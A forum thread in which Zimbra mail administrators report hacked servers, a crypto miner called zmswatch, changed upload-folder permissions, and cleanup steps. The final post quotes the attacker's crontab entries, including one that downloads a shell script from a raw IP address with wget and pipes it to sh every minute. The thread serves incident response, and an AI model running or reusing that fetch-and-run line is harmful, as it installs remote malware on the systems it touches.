Zimbra AJAX Webmail not loading

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
faruque_bd
Posts: 3
Joined: Sun May 26, 2019 8:04 am

Re: Zimbra AJAX Webmail not loading

Postby faruque_bd » Mon May 27, 2019 7:13 am

We have faced the same problem after fixing the login issue.

We have fix the problem and it is working now

the permission of /opt/zimbra/data/tmp/upload directory has changed to 550, so the attachment file can not load.

change the folder permission to 750 and this will solve your problem.

Pls check the crontab of zimbra user and remove any unwanted line, you may find it at the bottom of the file

Thanks


Klug
Elite member
Elite member
Posts: 2352
Joined: Mon Dec 16, 2013 11:35 am
Contact:

Re: Zimbra AJAX Webmail not loading

Postby Klug » Mon May 27, 2019 7:29 am

Are you people running a patched (to the very last patch) version of ZCS?
Your servers might be compromised.

You should have a look at these :
viewtopic.php?t=66031
viewtopic.php?f=15&t=65932

The zmswatch binary you have in /opt/zimbra/log is definitively not a ZCS genuine file nor process.
brillo61
Posts: 1
Joined: Mon May 27, 2019 7:49 am

Re: Zimbra AJAX Webmail not loading

Postby brillo61 » Mon May 27, 2019 7:56 am

j122yka : Solved issue with upload refuse by :

chmod 755 /opt/zimbra/data/tmp/
chmod 755 /opt/zimbra/data/tmp/upload/

Cannot find unusual cron entries (looking with # crontab -e -u zimbra) and in the files under /opt/zimbra/conf/crontabs/
Changed root password after reboot.

Any help appreciated to find and clean the hack! Thank you!

(Zimbra 8.7.11_GA_1854, Ubuntu 16.04)
MaySky
Posts: 24
Joined: Sat Apr 02, 2016 6:57 am

Re: Zimbra AJAX Webmail not loading

Postby MaySky » Mon May 27, 2019 8:04 am

mmart wrote:i have zimbra 8.7.5. I have nothing unusual in crontab, only zmswatch.sh and this perrmissions error happened again twoday. Any idea why ?

zmswatch.sh is a crypto miner. Look at the "top" command. It is draining your CPU.
This file does not belong to Zimbra.
Klug
Elite member
Elite member
Posts: 2352
Joined: Mon Dec 16, 2013 11:35 am
Contact:

Re: Zimbra AJAX Webmail not loading

Postby Klug » Mon May 27, 2019 8:30 am

You're not fixing the hack until you have patched your server and clean it up fully.
whyrukter
Posts: 3
Joined: Thu Nov 06, 2014 4:31 am

Re: Zimbra AJAX Webmail not loading

Postby whyrukter » Mon May 27, 2019 8:55 am

I'm check my zimbra version

Code: Select all

Release 8.7.4.GA.1730.UBUNTU16.64 UBUNTU16_64 FOSS edition.


use top command have process
https://imgur.com/gbVCQms

and login user with zimbra use history command show this command
https://imgur.com/A3zr5D8

please help.
koval1986
Posts: 5
Joined: Mon May 27, 2019 5:30 am

Re: Zimbra AJAX Webmail not loading

Postby koval1986 » Mon May 27, 2019 9:13 am

I have the exact same problem as you.
.kthrotlds 400%
saifulbd
Posts: 1
Joined: Mon May 27, 2019 8:57 am

Re: Zimbra AJAX Webmail not loading

Postby saifulbd » Mon May 27, 2019 9:17 am

The solution posted by AB_Zimbra worked for me. Thanks!
mmart
Posts: 4
Joined: Mon Oct 08, 2018 7:46 pm

Re: Zimbra AJAX Webmail not loading

Postby mmart » Mon May 27, 2019 9:30 am

MaySky wrote:
mmart wrote:i have zimbra 8.7.5. I have nothing unusual in crontab, only zmswatch.sh and this perrmissions error happened again twoday. Any idea why ?

zmswatch.sh is a crypto miner. Look at the "top" command. It is draining your CPU.
This file does not belong to Zimbra.


stoped zimbra, kill zmswatch process, removed in from crontab and remove files. No i have to upgrade to 8.8.12 ?
efremovvk
Posts: 1
Joined: Mon May 27, 2019 9:47 am

Re: Zimbra AJAX Webmail not loading

Postby efremovvk » Mon May 27, 2019 9:58 am

zanthius wrote:So, thanks for the tip on checking crontab, I found something slightly different to yours, right down the very bottom:

*/15 * * * * sh /opt/zimbra/log/zmswatch.sh;

It looks like it calls another executable file in /opt/zimbra/log/ called zmswatch

That was using 200% CPU. Killed it and removed the crontab entry.

Love to know the entry point for this, but we have an older version
Release 8.6.0_GA_1153.SLES11_64_20141215151129 SLES11_64 FOSS edition, Patch 8.6.0_P7.


Same
* * * * * wget -q -O - http://93.113.108.146:443/cr.sh | sh > /dev/null 2>&1
*/15 * * * * sh /opt/zimbra/log/zmswatch.sh;

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 20 guests